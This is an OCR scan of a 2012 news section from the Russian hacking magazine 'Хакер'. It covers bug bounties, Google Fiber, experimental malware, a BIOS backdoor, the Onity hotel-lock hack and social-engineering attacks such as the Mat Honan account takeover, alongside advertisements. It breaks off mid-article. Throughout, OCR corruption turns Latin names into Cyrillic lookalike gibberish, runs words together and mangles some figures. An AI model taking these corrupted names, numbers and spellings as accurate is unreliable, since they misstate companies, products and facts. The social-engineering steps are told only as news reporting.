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КРАУДСОРСИНГ В БЕЗОПАСНОСТИ 

Мне очень нравится идея краудсорсинга: предложить большую 
и сложную задачу неограниченному кругу лиц. Та к, МА5А в ре- 
альном времени выкладываетснимки и информацию с датчиков 
марсохода Сиповку. Их подход простой: если что-то интересное 
про морга ют сам и, то, возможно, это за метят ученые и любители со 
всего мира. Зачем ограничиваться только своими ресурсами, если 
на свететысячи специалистов, каждый из которых можетсделать 
важное для человечества открытие? Или более приземленный 
пример — ѴѴікіресІіа. Мы бы никогда не получили свободную 
энциклопедию, если бы однажды всем желающим не предло- 
жили писать и редактировать в ней статьи на интересующие их 
темы. Сейчассложно представитьдругой способ собратьтакой 
объем данных на разныхязыках и за столь короткое время. Идея 
краудсорсинга можетбыть использована практически повсемест- 
но, и область безопасности, конечно, не исключение. Крупные 
ІТ-компании давно приняли горькую правду: какие бы силы ни 
были брошены на безопасность, какие бы методологии разработ- 
ки безопасного кода ни использовали — всегда останутся слабые 
места, в любом случае будут уязви мости. Если ты не найдешь их 
сам, то ихопределенно найдет кто-то еще. Другой вопрос, как 
он ими воспользуется. Напишетсплоит и продастего на черном 
рынке? Или сообщит об уязвимости, рассчитывая на уважение и 
вознаграждение? Чтобы стимулировать второй варианти придать 
исследователям уверенность, что их не осудят за подобную актив- 
ность, прогрессивные компании запускают РеѵѵагсІ- программы. 
Кпримеру, Гугл, один из первопроходцев вэтом направлении, дав- 
но нетолько публикуетблагодарности исследователям, но и вы- 
плачивает вполне серьезные вознаграждения. Это дает резул ьтат: 
исправлены сотни критическихуязвимостей, о которыхсообщили 
люди со всего мира. Я рад, что к этому рациональному движению 
начинают присоединяться и российские компании, в том числе 
Яндекс. В этом большая заслуга главы информационной безопас- 
ности — Антона Карпова, у которогомы взяли интервью для этого 
номера. 

Степан «51ер» Ильин, 
главредХ 

іѵѵіиег.сот/5ІераЬ 
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автоматически отменяетлюбые 
изменения в файле Н0БТ5, сообщают 
удивленные пользователи. 



ЭКСПЕРИМЕНТАЛЬНЫЙ 
И БЕСПЛАТНЫЙ ИНТЕРНЕТ 
ОТ 6006БЕ 

НОВЫЙ ПРОЕКТ КОРПОРАЦИИ ДОБРА 

□ ольше пяти лет Соодіе пытается создать продукт, окупае- 
мый за счет рекламы. Эта идея лежала в основе ОС АпсІгоісІ, 
и похожий подходбыл применен для планшета ІМехиз, 
который в СШАпродается фактически по себестоимости (Ооодіе 
планируетмонетизироватьотдачу отпродажпри помощи контента). 
Теперь ІТ- гига нт замахнулся на совсем новый для себя рынок — ре- 
шил стать интернет-провайдером, сохраняя при этом излюбленный 
подход. Новый проектполучил имя Ооодіе РіЬеги пока работаете 
«тестовом режиме», в небольшом городке Канзас-Сити, США. Ооодіе 
РіЬег — высокоскоростная оптоволоконная сеть, теоретически спо- 
собная выдаватьскорость 1 Гбит/с. Вся сольздесь кроется в модели 
предоставления услуг — по сути, Ооодіе предлагает бесплатный 
интернет. Один из тарифов, к примеру, вы глядит та к: 5 Мбит/с без 
абонентской платы. Пользователь оплачивает л ишь подключе- 
ние — 300 долларов (маршрутизатор + кабель). Притом оплату можно 
произвести равномерными частями, по 25 долларов ежемесячно 
втечение года. Ооодіе гарантирует, что после выплаты 300 долла- 
ров юзеры будут получать бесплатные 5 Мбит/с втечение семи лет 
(а скорее всего — бессрочно). В чем же выгода самой Ооодіе? В том, 
что абонента м дополнительно предл а гается услуга кабельного ТВ 
и более интересныетарифы, носабонентской платой. В компании 
рассчитывают, чтолюди самизахотяти со временем станут платить 
больше. Полагаем, такая модель можетсработать. 




Будто одного бес- 
платного интернета 
быломало — вкаче- 
ствебонусаСоодіе 
дарит всемсвоим 
абонентамтерабайт 
пространства воб- 
лачномхранилище 
Соодіейгіѵе. 



МОНСТР ФРАНКЕНШТЕЙНА 
ИЗМИРАМАЛВАРИ 



ВИРУС, КОТОРЫЙ СОБИРАЕТ СЕБЯ САМ 




еобычный ответ на извечный вопрос, как спрятать вредо- 
нос от анти вирусного ПО, дали американские ученые из 
Техасского университета в Далласе. Экспериментальный 
вирус был создан по за казу армии США и получил говорящее имя 
Ргапкепвіеіп. Дело в том, что он способен автоматически «собрать 
себя» из фрагментов кода другого ПО, уже установленного на 
компьютере жертвы. В процессе работы вирус формирует собствен - 
ноетело из небольших фрагментов кода (которые исследователи 
называют гаджетами) легальных приложений — например, Іпіегпеі 
Ехріогегили ІМоІерасІ. Сборка рабочего тела по заданным инструк- 
циям повторяется на всехзараженных компьютерах, но каждый 
раззадействуются новые гаджеты, так что бинарник вируса по- 
лучается уникальным. Во всяком случае, так заявляют создатели 
Ргапкепзіеіп. 

Пока ученые реализовал и только два простых тестовых алгорит- 
ма, но всеравнодоказали, чтотакое«самосборное» ПО вполнеможет 
существовать. Конечно, приусложнении функционала программы 
количество гаджетов, пригодныхдля построения еетела, будетсо- 
кращаться, однако вряд л и это остановит опытных вирусописателей. 





ТѴѴІТТЕКскоро запустит 
функцию, позволяющую 
скачать историю опублико- 
ванных сообщений в виде 
отдельного файла (пока 
для этого нужно юзать сто- 
ронниесервисы). 



05X10.8 сталасамымуспеш- 
ным софтверным релизом 
Арріе за всю историю: только 
за первые четыре дня ОС 
загрузили болеетрехмил- 
лионовраз. 



БЕСПЛАТНЫЙ ИНЕТОТ 
АМА20Ы кончился. Вла- 
дельцы читалок КіпсІІе с 36 
на бортулишисьхалявы: 
теперь бесплатно можно 
зайти только в ѴѴікірегііа и на 
самАтаюп. 



6006ЬЕ ПОДНИМАЕТ ставки: 
призовой фонд конкурса 
Рѵѵпіит теперь составляет 
два миллиона долларов, 
плюс увеличена награда за 
баги, найденные в продуктах 
компании. 



ШКЕОШ УЖЕ ПОТРАТИЛА 

нарасследованиенедавней 
утечки паролей отбООтысяч 
доі миллиона долларов 
и планирует вложить в два 
раза больше в улучшение 
безопасности. 
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реклама специальные условия скидка три процента 



прошли «Директорский курс» 
бизнес-школы «Самолов и Самолова» 




Алексей Дегтярев — гендиректор В2В-Сеп1ег с 2005 года. 
Под его руководством компания увеличила выручку более 
чем в 5 раз. В 2010 году прошел «Директорский курс» в 
бизнес-школе «Самолов и Самолова». 

Формула «Я начальник , ты дурак» ошибочна. Руково- 
дить нужно с помощью вопросов и рекомендаций , а не 
с помощью ответов. 

Трудоголизм — это болезнь , замещение остальных 
сфер жизни одной , где все получается. Но первый же 
барьер может сбить такого человека полностью. 

Точки мотивации руководителя — имидж и самосовершен- 
ствование. И еще , мне кажется, психологическое 
удобство. Оно является тормозом для циничных решений. 

С людьми работать приятнее, чем с «персоналом». 



Где учатся топ-менеджеры? 

«Директорский курс» — это программа для директоров и 
собственников, которые хотят учиться в группе равных 
себе. С 2004 года он проходит в открытом формате, чтобы 
принять участие в нем смогли все желающие. 

Курс настолько практичен, что ряд ведущих компаний 
используют его в качестве основы для своих корпоративных 
университетов. Самый крупный проект был реализован в 
компании, обучившей по программе курса более 3 000 
руководителей. 

Людей, прошедших курс, объединяют общий язык и единый 
взгляд на управление. 



«Директорский курс» я проходил болезненно. Он для всех 
проходит болезненно. Но открывает глаза на собствен- 
ные недоработки, слабые стороны. Показывает, как, куда 
и что менять. Это серьезный инструмент. 

Было ощущение, что курс идет спонтанно. Случайно 
увидел у тренера план занятий. Все поминутно расписано. 
Не бывает спонтанно такой эффективной работы. 

Мне приятно соотносить себя с брендом бизнес-школы 
«Самолов и Самолова». Он дает чувство сопричастности 
к большому делу, к хорошему «племени». 



Вы можете принять участие в «Директорском курсе» в 
любом из четырех городов: Москве, Санкт-Петербурге, 
Новосибирске или Красноярске. 

Обратитесь в бизнес-школу «Самолов и Самолова», и мы 
предложим вам удобный график обучения и группу 
участников, равных вам по уровню. 



Для читателей «Хакер» специальные условия. 



Самолов и Самолова 



(495) 660-01-05 Москва 

(812) 313-40-50 Санкт-Петербург 

(383) 335-77-99 Новосибирск 
(391) 277-66-11 Красноярск 
ѵѵѵѵѵѵ.затоіоѵ.ги іп^о@5атоІоѵ.ги 






МЕ6АЫЕѴѴ5 



ПО ИТОГАМ ОПРОСА СРЕДИ ЧИТАТЕЛЕЙ ТЕСНКЕРУВиС, лишь 18, 5% компаний планируют апгрейд до \ѴІПСІ0№5 8. 



УЯЗВИМОСТИ БЫВАЮТ 
ДАЖЕ У ДВЕРНЫХ ЗАМ КО В 

ХАКЕРПОСТАВИЛ В НЕЛОВКОЕ ПОЛОЖЕНИЕТЫСЯЧИ ГОСТИНИЦ 



ЧЕРНЫЙ ПОЯС 
ПО СОЦИАЛЬНОЙ 
ИНЖЕНЕРИИ 




«Думаю, любой 

стажерАНБ 

обнаружил бы 

этууязвимость 

за несколько 

минут»,— говорит 

Брошес. Между 

темэлектронные 

замкиОпіІуис- 

пользуютсяв 

4-5 миллионах 

гостиничных 

номеровповсему 

миру. 



етривиальный взлом сумел провернуть 24-летний эксперт в области 
информационной безопасности Коди Брошес — он взломал систему 
компании Опііу. Эта система запирания дверей широко распростране- 
на в гостиничной сфере по всему миру. 

Чтобы хакнуть электронный замок (конечно, не имея на руках ключ- 
карты), эксперту потребовалась простенькая опенсорсная «железка» на базе 
Агбиіпо, стоимостью 50 долларов, и написанное собственноручно ПО. Меха- 
низм взлома тоже предельно прост — подключаем девайс к замку, включаем 
питание, и замок открывается. Прибор Брошеса, по сути, имитирует про- 
грамматор, который позволяет сотрудникам отелей открывать любой замок 
«универсальным ключом». 

Хотя все, по словам Брошеса, работает«вопиюще просто», создатьтакое 
устройство было нелегкой задачей. Например, во время тестирования в разных 
отелях эксперт замети л, что трюк срабатывает далеко не на всех замках, а лишь 
примерно на каждом третьем. Программа открывает замки благодаря атаке 
на встроенный программный модуль. Оказалось, что память этого модуля не 
защищена и доступна для считывания любой программе, которая обращается 
с запросом. Хотя в каждом замке есть свой зашифрованный ключ, он практиче- 
ски не спрятан и доступен для считывания. Устройство просто забирает ключ из 
памяти итутже «предъявляет» его этому же электрон ному замку, чтобы тот от- 
крылся. Все подробности Брошес уже опубликовал на своем сайте ( сіаекеп.сот ). 
Компания Опііу, в свою очередь, публично пообещалаустранитьобнаруженную 
хакеромуязвимость, правда неуточнив, какименно. 




ВЕСНОЙ— ЛЕТОМ 2012 РЕЗКО ВЫРОСЛО ЧИСЛО 50І_-ИНЪЕКЦИЙ 



КОЛИЧЕСТВО 501-ИНЪЕКЦИЙ 
ПОДСКОЧИЛО ДО 470 ТЫСЯЧ, 
А ИХ ДОЛЯ В ОБЩЕМ ОБЪЕМЕ 
АТАК УВЕЛИЧИЛАСЬ С 10 ДО 
21%, ПОДСЧИТАЛ РІЯЕН05Т 



НАОЕРСОЫ ПРОШЛО НЕ СОВСЕМ ОБЫЧНОЕ 
СОРЕВНОВАНИЕ 

ЕР СОЫ — одна из самых известных и старых 
хак-конференций в мире, иужетри года на йЕР 
СОЫ проводяттрадиционный чемпионат по со- 
циальной инженерии. В самом деле, техническая под- 
кованностьхакеров порой отходитна второй план, потому 
что воспользоваться человеческим фактором зачастую 
проще, быстрее иудобнее. 

Чемпионат на Б ЕР СОЫ проходит по следующим пра- 
вилам: за две недели до финального раунда (который 
проводится непосредственно на конференции) соци- 
альные инженеры получают письма с именем (вернее, 
названием, так как речь идет о компаниях) и БІРС- 
адресом жертв. Компании выбираются случайным 
образом. В этом году в списке жертв значились та кие 
монстры, как II РБ, РебЕх, БЬеІІ, Сізсо, НеѵѵІеМ-РаскагсІ, 
АТ&Т и многие другие. 

Две недели отводятся участникам соревнования 
на изучение открытых источников информации о жерт- 
вах. Уже на этом этапехакеры получаюточки за каждый 
«собранный флаг» — когда находят информацию, 
указанную в задании. Как правило, там перечислено 
немало всего — например, нужно узнать точную версию 
почтового клиента, установлен но го у жертвы. При этом 
во время подготовки конкурсантам категорически за- 
прещено звонить или писать жертве и связываться с ней 
каким-либо другим образом. Лишь в ходе очного финала 
на 0ЕРС0Ы каждый участник получает 20 минут на теле- 
фонный разговор, и разговортранслируется через 
колонки прямо в зрительный зал. 

Чемпионом текущего, 2012 года стал Шейн Мак- 
дуга л, который к тому же сумел поставить рекорд по 
количеству собранных флагов за все три года прове- 
дения конкурса. Макдугал «взломал» корпоративную 
сеть супермаркетов ѴѴаІ-МагІ, выполнив абсолютно 
всезадания. 

Хакер позвонил в отдел продаж компании ѴѴаІ-МагІ, 
представился неким Гэри Дарнеллом и пообщался 
с менеджером магазина. По телефо ну хакер рассказал 
менеджеру сказку о том, что ѴѴаІ-МагІ имеет шанс по- 
лучить многомиллионный государственный контракт, 
пояснив, что пока изучаются все потенциальные 
кандидаты. Менеджер охотно сообщил Макдугалу всю 
базовую информацию о ком па ни и, расписание работы 
сотрудников, общие сведения об организации складов 
и многое другое. Затем он рассказал, на каких компью- 
терах работает офис компании, какая у него ОС и каким 
браузером и антивирусом он пользуется. В конце концов 
менеджер открыл браузер и ввел в адресную строку 
II РБ, который хакер продиктовал ему по телефону. Ком- 
пьютер заблокировал страницу, но менеджер не рас- 
терялся и сказал, что обратится в ІТ-отдел, чтобы они 
«исправили проблему»! 

Уже после конкурса Шейн Макдугал прокомментиро- 
вал свой «взлом» и поделился наблюдениями. По его сло- 
вам, лучше всего длятакихтрюков подходятсотрудники 
отделов продаж. Кактолько речьзаходито коммерческой 
выгоде, многие люди просто отключают логику и забыва- 
ютоб осторожности. 
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166 рублей 
за номер! 



Нас часто спрашивают: «В чем преимущество подписки?» 

Во-первых, это выгодно. Потерявшие совесть распространители не 
стесняются продаватьжурнал за 300 рублей и выше. Во-вторых, это 
удобно. Не надо искатьжурнал в продаже и бояться проморгать момент, 
когда весьтиражуже разберут. В-третьих, это шанс выиграть один из 
трехЗб-роутеров от«Билайн»! 



ПОДПИСКА 

6 месяцев 1110 р. 
12 месяцев 1999 р. 







ПОДАРОК 





Эта маленькая коробочка — беспро- 
водой 36-роутер, который позволит 
тебе с помощью ѴѴі-Рі подключить к 
мобильному и нтернету сразу несколько 
устройств. Благодаря встроенной 
литий-полимерной батарее роутер 
можно использовать даже в дороге, 
вдали отосновного источника питания. 

Первые пятьчитателей, оформив- 
шие годовую подписку в периоде 26 
сентября по Юоктября, получатв по- 
дарокэтот беспроводнойЗб-роутер. 
Забрать свой приз можно будет в салоне 
«Билайн». Оформить подписку можно 
за пару минут на сайте ШрѴ/вЬор.дІс.ги . 



ЬКрУ/зЬор.дІс.ги 



Ѵ75А €& І Й О 



8 (800) 200-3-999 (бесплатно) 

зиЬвсгіЬеОдІс.ги 





МЕ6АЫЕѴѴ5 



ТЫСЯЧА ФАЛЬШИВЫХФОЛОВЕРОВВТѴѴІТТЕКстоитвсего 18 долларов, подсчитал аналитик компании Ваггасис1аІ_аЬ5 Джейсон Динг. 



МІТХ НА БАЗЕ ЫѴЮІАТЕ6РАЗ 



ПРЕДСТАВЛЕНА ПРИЯТНАЯ МАТЕРИНКА НА БАЗЕ ТЕСКА 




омпания Копігоп, хорошо известная как произво- 
дитель комплексных решений для промышлен- 
ного использован ия, анонсировала материнскую 
плату Копігоп КТТЗО/тІТХ. Форм-фактор новинки — 
Міпі-ІТХ (то есть габариты платы 1 70 х 170 мм), а значит, мы 
видим перед собой интересное решение для компактных 
компьютеров и различных встраиваемыхустройств. 

Как понятно из заголовка, одноплатный компьютер бази- 
руется на однокристальной системе ІМѴЮІАТедга 3 
(4-РШ5-1), хотя тактовая частота СРІІ платформы была 
снижена с референсного значения 1,3 ГГц до 900 МГц. 
Впрочем, похоже, что это единственное изменение в 5оС, 
оснащение которой по-прежнемусоставляютграфиче- 
ский ускоритель СРІІ ІМѴЮІАСеРогсе ІІІ_Р (с заявленной 
возможностью кодирования/декодирования видео 
высокой четкости в формате вплотьдо 1080р) и контроллер 
оперативной памяти ББРЗ (максимальный поддерживае- 
мый объем оперативной памяти новинки — 2 Гб). Произ- 
водитель заявляет о поддержке Ыпихи АРМ, но в теории 
Копігоп КТТЗО/тІТХдолжна работать и подуправлением 
грядущей ѴѴіпсІоѵѵз РТ. 

Плата оснащена сетевым контроллером ВідаЬіІ 
ЕіЬегпеІ, звуковым кодеком и слотом для 5ІМ-карты, 
такчто возможна передача данных через мобильную 
сеть. Информации о сроках появления новинки в про- 
даже и цене пока нет. 





Плата можетпо- 
хвастаться большим 
числом различных 
интерфейсных 
разъемов. Среди них 
115В 2.0, видеовыход 
НШМІ 1.4а, порт 
К.Ь45,тРСІеи 
другие. Предусмо- 
тренои два гнезда 
дляустановки карт 
памятиБОивозмож- 
ностьподключения 
накопителейсин- 
терфейсамиеММС 
и БАТА 3 Гбит/с. 



БЭКДОР ПОДМЕНЯЕТ 
СОБОЙ ВІ05 

БЕРЕГИ СВОЙМВК 

□ последнее время часто можно услышать непри- 
ятные новости отроянах, которые предпочитают 
окопаться в ВІ05 и могут«выжить» даже после 
замены жесткого диска. Мы уже рассказывали тебе о 
МеЬготі и І\1іѵѵа!тет, и вотхакеры додумалисьдо еще од- 
ной похожей софтины. Ксчастью, новый бэкдор РакзЬаза 
разработали в экспериментальных целях — сделал и это 
сотрудники французской ИБ-компании Тоисап Зузіет, и 
он и же представили доклад о своем детище на О ЕР СОИ. 

Основноеотличие РакзЬаза отдругой подобной малва- 
ри заключается в том, что он использует ряд новых трюков, 
из-за которых его еще сложнее обнаружить и уда лить. 
РакзЬаза, посути, заменяет собой ВІОБ на материнской 
плате и фактически берет на себя системную инициали- 
зацию аппаратных компонентов. Родную версию ВІ05 
бэкдор подменяеткомбинацией открытых реализаций 
ВІОЗСогеЬооІ иЗеаВІОЗ, что позволяет ему работать на 
различных матери неких платах от разных производителей 
(230 моделей материнских плат поддерживаются точно). 
Также вредоноспереписываеткомпоненты ІРХЕ, ответ- 
ственныеза сетевуюзагрузку компьютера или сервера. 

За счетиспользования кодов СогеЬооІавторы дажесмогли 
создать модифицированный приветственный экран, что- 
бы пользовательничегонезаподозрил. Стоитли говорить, 
что антивирусы, работающие на уровне ОС, тоже ничего не 
заподозрят?.. Радуетодно:уэтойжутковатой разработки 
пока есть серьезная проблема — дляустановки буткита 
требуется физический доступ к компьютеру для перепро- 
шивки ВІ05. 





ЛУЧШИЙ ѴШООѴѴЗРНОЫЕ Длятех, ктоприсматривается к 
молодой, но весьма перспективной ОС ѴѴіпсІоѵѵз РЬопе- реко- 
мендуем ІЧокіа І_итіа900. Большой4,3-дюймовыйэкрансфир- 
менной технологией Мокіа СІеагВІаск, традиционно красивый 
дизайн железа от Мокіа и прочный корпус, 8-мегапиксельная 
камера с оптикой отСагІ 2еІ55, мощный процессор и емкостный 
аккумулятор. Вместе с ѴѴіпсІоѵѵз РЬопе вы получаете доступ 
к бесплатному облачному интернет-хранилищу БкуОгіѵе для 
синхронизации ихранения контактов, документов, фотогра- 
фий и прочего контента. Магазин приложений ѴѴіпсІоѵѵз РЬопе 
Магкеіріасе растет не по дням, а по часам, уже сейчас в нем 
более 100 000 высокачественных приложений и игр. Кроме 
того, Мокіа предлагаетэксклюзивные сервисы для владельцев 
І_итіа: бесплатные Карты и Навигатор по всему миру. Радио 
Микс,Сатега Ехігави многоедругое. 




МІСГ050Й 



НЕМЕЦКИЙ ПСИХОЛОГ КРИ- 
СТОФ МЕЛЛЕР считает, что 
профиля в РасеЬоок не имеют 
восновном асоциальные лич- 
ности и преступники. Хорошо, 
что этолишьчастное мнение. 



ЛОГОТИП КОМПАНИИ 
МІСК050РТ, остававшийся не- 
изменным на протяжении 25 
лет, решили обновить.Теперь 
лого соответствуетстилю 
интерфейса ѴѴіпсіоѵуз 8. 
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ГОЛОСУЙ ЗА СВОЮ ЛЮБИМУЮ МАШИНУ! 



Мы за честные 

выборы! 



Реклама 



ТОЛЬЮ ДЛЯ ЧИТАТЕЛЕЙ ЖУРНАЛА 

СЛЕДИ ЗА АНОНСАМИ 



трети 



Международное голосование за лучшие автомобили 2013 в конкурсе ВЕБТ САНБ. 








МЕ6АЫЕѴѴ5 ОКОРВОХ НАШЕЛ ИСТОЧНИК НЕДАВНЕЙ УТЕЧКИ пользовательских данных и теперь вводит двухфакторную систему аутентификации. 



ФЕЕРИЧЕСКИЙ ВЗЛОМ. 
ВСЕ ГЕНИАЛЬНОЕ ПРОСТО 

ІТ-ЖУРНАЛИСТА ВЗЛОМАЛИ, КОМПАНИЯ АРРІ.Е 
ЗАДУМАЛАСЬ О БЕЗОПАСНОСТИ 




жедневно десятки тысяч человек и сотни ком- 
паний становятся жертвами хакеров, но далеко 
не со всеми приключаются столь громкие и резо- 
нансные истории, какая недавно произошла с западным 
ІТ-журналистом Мэтом Хонаном. 

Нашим читателям, которые следят за крупными 
англоязычными СМИ, имя Мэта наверняка знакомо — 
этот парень писал и пишет для Сігтосіо, ѴѴігесІ, МасѵѵогІсІ, 
Рориіаг Бсіепсе и кучи других серьезных изданий. 
Однако на этот раз Хона н сам послужил информацион- 
ным поводом для сотен публикаций по всему миру. Дело 
в том, что журналиста беспощадно взломали хакеры 
из группы СІап ѴѵЗ. 

Хонан подробно изложил хронику событий в своем 
блоге ( етріуаде.сот ). Приведем ее и мы. Сначала некто 
подобрал семизначный пароль к его аккаунту іСІои б 
(пароль был уникален и нигде более не использовался]. 
Через две минуты после этого хакеры сменили пароль 
на почтовом ящике СтаіІ, выслав подтверждение на 
почтовый адрес .тас, который был указан в качестве 
резервного. За следующие десять ми нут зл оу мы ш лен- 
ники дистанционно очистили іРЬопе, іРасІ и МасВоок 
Аіг журнал иста от всего, что на них хранилось. Заметим, 
что реанимировать ноутбук в сервисном центре Арріе 
не удалось, и для восстановления информации Хонан 
обратился в фирму ОгіѵеЗаѵегз. Эти парни сумели спасти 
частьданных, но Мэтзаплатил им 1690 долларов. Инфор- 
мация — недешевая штука. 

Данные удалили дистанционно с помощью сервиса 
РіпсІ МуіРГіопе. Но на всем этом хакеры не успокоились 
и поменяли па роль в твиттере Мэта. Та к как его аккаунт 
был привязан к официально му твиттеру Сігтосіо, бук- 
вально через несколько минут уже в твиттере Сігтосіо 
появились сообщения от взломщиков. 

«Но как?» — с просишь ты. Оказалось, что хакеры 
подошли к вопросу креативно и для взлома воспользо- 
вались старой доброй... социальной инженерией. Когда 
Хонан стал разбираться в случившемся, подробности 
ошарашили не только его, но и ІТ-шни ков по всему миру. 
Подготовку к эпическому ха ку СІап ѴѵЗ начали изда- 
лека. Сначала неизвестный хакер позвонил в сап порт 
Атагоп, назвал имя, домашний адрес и е-таіі Хона- 
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на и попросил добавить новую кредитку к его 
аккаунту. Вскорехакер перезвонил в Атагоп 
еще раз и соврал, что забыл пароль. Добрый 
сап порт сгенерировал ему новый пароль, когда 
хакер вновь назвал имя Мэта, адрес и номер кре- 
дитной карты (только что добавленной самим ха- 
кером). Журналисты ѴѴігесІ провели эксперимент 
и попытались повторить этот трюк. Получилось, 
притом не один раз! 

Но, как ты понимаешь, для вышеописанного 
взлома «явок и паролей» к Атагоп хакерам было 
недостаточно. Узнав последние цифры номера 
банковской карты журналиста, хакеры позво- 
нили прямо в службу поддержки Арріе. Снова 
назвав оператору все да иные Хона на, хакер 
попросил сап порт предоставить ему времен- 
ный пароль для аккаунта 0 те. сот. Что сап порт 
и сделал. Дальнейший курс развития событий 
тебеуже известен. 

Эта история получила огромный резонанс 
в СМИ по всему миру. Безопасность Арріе и Атагоп 
склоняли все кому нелень, и компании вынужде- 
ны были отреагировать на эту «волну народного 
гнева». В частности, и там и там уже заблокирова- 
ли возможностьсмены пароля и банковской карты 
потелефону. 




Анализируя случившееся сХонаном, 
можно сделать очевидные выводы: 
не стоит пренебрегать двухступенча- 
тойаутентификацией,излишнедо- 
верятьоблачным сервисам и забивать 
на бэкапы. Хонан из-за этого лишился 
почти всехданныхза год работы 
и л ишьс огромным трудом сумел вос- 
становить аккаунт бтаіі. 



«ѴѴІЫ00ѴѴ5 8 СТАНЕТ 
КАТАСТРОФОЙ ДЛЯ ВСЕХ 
В РС-ПРОСТРАНСТВЕ», — 
ЗАЯВИЛ ГЛАВА ѴАЬѴЕ 
ГЕЙБ НЬЮЭЛЛ НА КОН- 
ФЕРЕНЦИИ В СИЭТЛЕ 
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іаскегіѵѵееіз 



Алексей Синцов 





(ЗтаИЫаге 

Самый быстрый способ для 
меня перестать воспринимать 
вас серьезно — это если вы 
дадите мне визитную карточку с «ЕіЬісаІ 
Наскег» и «СІ550» на ней. 



(ВписІеІіаЬегсІаБІіег 

Кто хочет слайды и статью по 
теме устройства кучи в ѴѴіпсІоѵѵз 
8? 90 простых страниц для рас- 
слабления и чтения ;] Ы 




Н Комментарий: 

Остается вопросом, кто эти несколько 
человек и в чем причина их интереса к 
такому сюжету — события в ЮА или чувак 
в одних трусах? Впрочем, я не хочу знать в 
любом случае... 



(Зсііпосіаігоѵі 

Может мне кто-нибудь объяс- 

нить, почему мы еще не перееха- 

, ли на ОоодІе+? Потому как неко- 

торые технические комьюнити уже сбежали 
оттирании в 140 символов? 
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МЕ6АЫЕѴѴ5 ВНОВОЙ ВЕРСИИ ІЯОККЕМТвсежебудетможноотключитьрекламу. Разработчики прислушалиськкомьюнити, воспринявшему рекламу вштыки. 



ПЯТИМИНУТКА БЕЗУМНЫХ 
ИЗОБРЕТЕНИЙ 



«БЕСКОНЕЧНАЯ» 

БАТАРЕЯ 



ПАССИВНЫЙѴѴІ-РІ-РАДАР СПОСОБЕН «ВИДЕТЬ» СКВОЗЬ СТЕНЫ 



НЕОБЫЧНЫЙ ГАДЖЕТ ОТ ЕХООЕАР 




□ идеть сквозь стены — мечта спецслужб всего 
мира. В одном из прошлых номеров мы уже рас- 
сказывали про передвижные рентгеновские 
сканеры, что колесят по городам подвидом обыкновенных 
фургонов. Сегодня представляем тебе еще более жуткое 
изобретение — пассивный ѴѴі-Рі-ра дар. Устройство 
разработали в Лондонскомуниверситетском колледже, 
и изобретатели уже отчитались — оно прекрасно работает. 
Принцип работы ѴѴі- Рі-рада ра трэд и ционен, в его основе 
л ежит эффект Допплера: любой движущийся объект от- 
ражает радиосигнал с изменением частоты. Чем выше ско- 
рость объекта, тем больше будет разница. Радар состоит 
из радиоприемника с двумя антеннами и модуля обработки 
сигналов. Первая антенна настроена на базовую частоту 
ѴѴі-Рі-маршрутизатора, вторая замеряет отраженный сиг- 
нал отдвижущихся объектов. Устройствоспособноопре- 
делить место положение движущихся объектов, зафикси- 
ровать их скорость и на правление движения. Сам радар 
при этом обнаружить невозможно, ведь от него никаких 
волн не исходит. Помехи дляустройства не представляют 
даже стены, правда, если их тол щи на не превышает одного 
кирпича. Впрочем, ученые обещают, что если доработать 
технологию, то можно будет не только сканировать через 
бол ее толстые стены, но даже определять частоту пульса 
и дыхания людей, находящихся за стеной. 



ѴѴі-Рі-сигнал 
можнозасечьв 
61% домов в США 
и в 25% по всему 
миру.Ученые 
полагают, что их 
изобретение будут 
использоватьдля 
присмотра иухода 
за детьми и по- 
жилымилюдьми, 
атакже в качестве 
детектора про- 
никновения. 



нешними батареями сегодня сложно кого-ли- 
боудивить, но компании Еходеагэто удалось. 
Необычноеустройство, получившее имя ЕхоѵоІІ 
РІиз Ваиегу Раск, — нечто иное, как внешняя батарея для 
подзарядки различных гаджетов, но новинка теоретически 
имеет бесконечную ем кость — ведь ее можно увеличи- 
вать, добавляя к «базовой» батарее все новые и новые 
элементы, которые продаются отдельно. Пределаутакого 
«конструктора» (опятьже втеории) нет. Каждая секция 
имеет емкость 5200 мА* ч. На одном из ребер главной 
батареи располагаются четыре светодиода, оповещаю- 
щиеобуровнезаряда, атакже разъемы 115В и Місго-ІІ5В 
для подключениязаряжаемыхустройств. Еходеаг ЕхоѵоІІ 
РІиз Ваиегу Раск предназначена в первую очередь для 
устройств компании Арріе, но легко может послужить «за- 
рядником» и для любыхсмартфонов и планшетов других 
производителей (выходноенапряжениесоставляетб В, 
ток — 2А). В комплектесбазовой батареей поставляются 
чехол, кабельдляустройств Арріе и кабель Місго-ІІ5В. 

Цена базовой секции составляет 90 долларов, а каждый до- 
полнительный элемент обойдется еще в 50. 






ГРАФИЧЕСКАЯ СИСТЕМА 
Х.ОКС наконец получила под- 
держку переключения видео- 
картна ноутбуках— осталось, 
чтобы нужный код попал в 
ядро І_іпих в версии 3.7. 



СИМВОЛ АМОЫѴМОиЗ может 
стать торговой маркой. За- 
явкунарегистрациюлогои 
девиза подала французская 
компания ЕагІуРІіскег, тор- 
гующая футболками. 



ТРЕКЕР ОЕМОИОЮ снова 
закрыли, и на этотраз все 
выглядит серьезно. Домены 
уже выставлены на продажу, 
анавладельцевзаведено 
уголовноедело. 



КОМ ПАН И Я ООООЬЕ за- 
ботится о своих людях. Вы- 
яснилось, что после смерти 
сотрудника Ооодіевтечение 
десяти лет продолжает 
выплачивать его семье 50% 
зарплаты. 



«ЛАБОРАТОРИЯ КАСПЕР- 
СКОГО» во втором квартале 
текущего года обнаружила 
14,9тысячи вредоносов 
для АпсІгоісІ (что почти втри 
раза больше, чем в первом 
квартале). 
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НЕ ВСЕ ГЛАДКО В СТАНЕ НР— компания анонсировала убытки по итогам третьего 
квартала финансового года. Они составят 8,9 миллиарда долларов. 



ПОМОГИТЕ, МОЙ 
ПРИНТЕРСОШЕЛСУМА 

ПОЛЬЗОВАТЕЛИ АРРІ_Е ИСПУГАЛИСЬ ПРИМИТИВНОЙ АТАКИ 




У этой, в общем-то, смешной ново- 
стиестьодин невеселый нюанс — 
большинство пользователей явно 
незнаютдажеотакой элемен- 
тарной вещи, каксканирование 
портов. И о какой безопасности 
после этого может идти речь? 



е все взломы разрушительны и вредны, иногда хакеры ломают и про- 
сто «Тогішп» или силясь привлечь внимание к какой-либо проблеме. 
И вот новый пример: с конца августа на форумах Арріе Еиррогі стали 
появляться жалобы пользователей, сообщавших, что их принтеры «сошли с 
ума» и принялись печатать наборы непонятных символов. На первом листе 
напечатана одна строка: 

о© <сІе=*ІЕЕЕМІздІехес49.280 

На втором — еще одна: 

